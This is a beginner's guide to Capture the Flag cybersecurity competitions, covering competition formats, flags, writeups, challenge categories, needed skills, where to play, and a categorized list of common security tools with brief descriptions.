Getting Started in Capture the Flag (CTF) Competitions
Capture the Flag (CTF) is one of the most interesting ways to learn cybersecurity. Learning through playing is an effective way to boost your skills and start in the cybersecurity field. We will discuss the basic the information about capture the flag (CTF) competitions, challenges, tools and resources for starting in capture the flag (CTF) competitions.This Article is designed to help the newcomers to those type of competitions and provide the skills required to get started in cybersecurity or seek a new career in the infosec.
What is CTF?
CTF stands for Capture The Flag,This is a type of cybersecurity competitions or games with a purpose to locate a particular piece of text called a flag that may be on the server or behind a web page.Capture The Flag (CTF) competition is simulating the real world scenarios of hacking a remote site or exploiting a vulnerability on a specific application. There are two common types of CTFs: Jeopardy and Attack-Defence
Type 1 => Jeopardy CTF
This type includes problems (challenges) like web, digital forensics, reverse engineering and others. Teams or individuals will gain points for any correct challenge they solve. Points are defined depending on challenges difficulty, challenges labeled as hard will help you to gain more points.
Type 2 => Attack-Defence
Here each team has its network of insecure devices (or just one host). Your staff typically has time to repair the infrastructure, and to fix vulnerabilities.So you will defend your own services for defence points , and hack opponents for getting attack points.
What is a Flag ?
A flag is some sort of text/MD5 hash that you submit to CTF portal to get the challenge points.(e.g flag{congr4tz_th!5_!5_fl4g})
What is a Writeup?
A writeup is a full documentation on how to solve a certain challenge. Reading writeups will help you to gain more knowledge and enhance your CTF skills.However, make sure to read the writeup only when you are really stuck in solving the challenge.
Challenge types
Jeopardy style CTFs challenges are typically divided into different categories. You will find below the most common types
Type 1 => Cryptography - This type of challenges include understanding the different encryption algorithms
Type 2 => Digital Forensics - This type of challenges include file format analysis, steganography, memory dump analysis, or network packet capture analysis.
Type 3 => Reverse Engineering - This type of challenges include the process of taking compiled code like .exe files or .apk or others and trying to convert it back into a more human readable format.
Type 4 => Web Security - This type of challenges include discovering vulnerabilities in web applications.
Type 5 => Exploitation - This type of challenges include
exploiting a service to find the flag, the reverse engineering techniques are also applied here in order to analyse the structure and behaviours of the binaries
Type 6 => Network Security This type of challenges include analysing traffic data like pcap files and others.
Type 7 => Open Source Cyber Intelligence - This type of challenges include using open source tools to gather information.
What skills are needed to play CTFs?
Playing capture the flag (CTF) competitions might need some basic prerequisite skills. You will need to have some basic knowledge of networking like subnetting, TCP/IP, routing and similar. Also, it is important to know some linux commands which will help you in using command line tools on kali linux. In addition to that, basic programming skills are also needed. You might not need to write code in some types of challenges but at least you need to know how to read code and understand it. The most important skill you need to have is to be persistent, you won’t be able to solve challenges from the first day. You will need to practice days and nights to be able to solve your first group of challenges. So, don’t give up easily and keep trying.
Where can I play CTFs ?
There are different websites where you can play online CTFs. The main website to search for the upcoming CTFs is CTFtime.org, this is a calendar for all the upcoming CTF that will happen across the world and on different platforms. Also, you can check the upcoming competitions on CyberTalents here. In addition, you can participate in some famous competitions like Google CTF CTF platform created by google
Tools
In order to start in capture the flag (CTF) competitions, we have listed some of the basic tools that you can use ordered by different challenges categories
WEB
Burp suite : common used tool for testing web applications with several features one of them is burp proxy for intercepting HTTP requests .
Cookie Editor : useful browser extension for editing cookies .
SQLMap : SQL injection and Database Exploitation tool .
DirBuster : directory brute forcing tool .
XSSer : useful tool to detect, exploit and report XSS vulnerabilities.
Crypto
rsatool : tool used to calculate RSA and RSA-CRT parameters.
CyberChef - Web app for analysing and decoding data.
PkCrack - A tool for Breaking PkZip-encryption.
QuipQuip - An online tool for breaking substitution ciphers or vigenere ciphers (without key).
XORTool - A tool to analyze multi-byte xor ciphers.
Digital Forensics
ExifTool : used for reading, writing and editing meta information in a wide variety of files (e.g JPEG, JPG, JPE)
Wireshark : tool for analyzing Network traffic and PCAP files .
linux install : apt-get install wireshark
Audacity : tool for analyzing audio files (e.g .mp3,.wav ,etc).
Foremost : extracting files based on their headers, footers, and internal data structures.
Stegsolve : used for applying different techniques on images
Volatility: To investigate memory dumps
Reverse
IDA Pro: most used Disassembler and Debugger.
Exploitation
DLLInjector: Inject dlls in processes
libformatstr: Simplify format string exploitation.
Metasploit: Penetration testing software
one_gadget: A tool to find the one gadget
Pwntools: CTF Framework for writing exploits
Qira: QEMU Interactive Runtime Analyser
ROP Gadget: Framework for ROP exploitation
V0lt:Security CTF Toolkit
Conclusion
Solving the challenges might be hard at the beginning, but once you start to practice, join the community and compete in some competitions you will find playing in the capture the flag (CTF) competitions is an effective way to learn cybersecurity, brand yourself and gain access to jobs.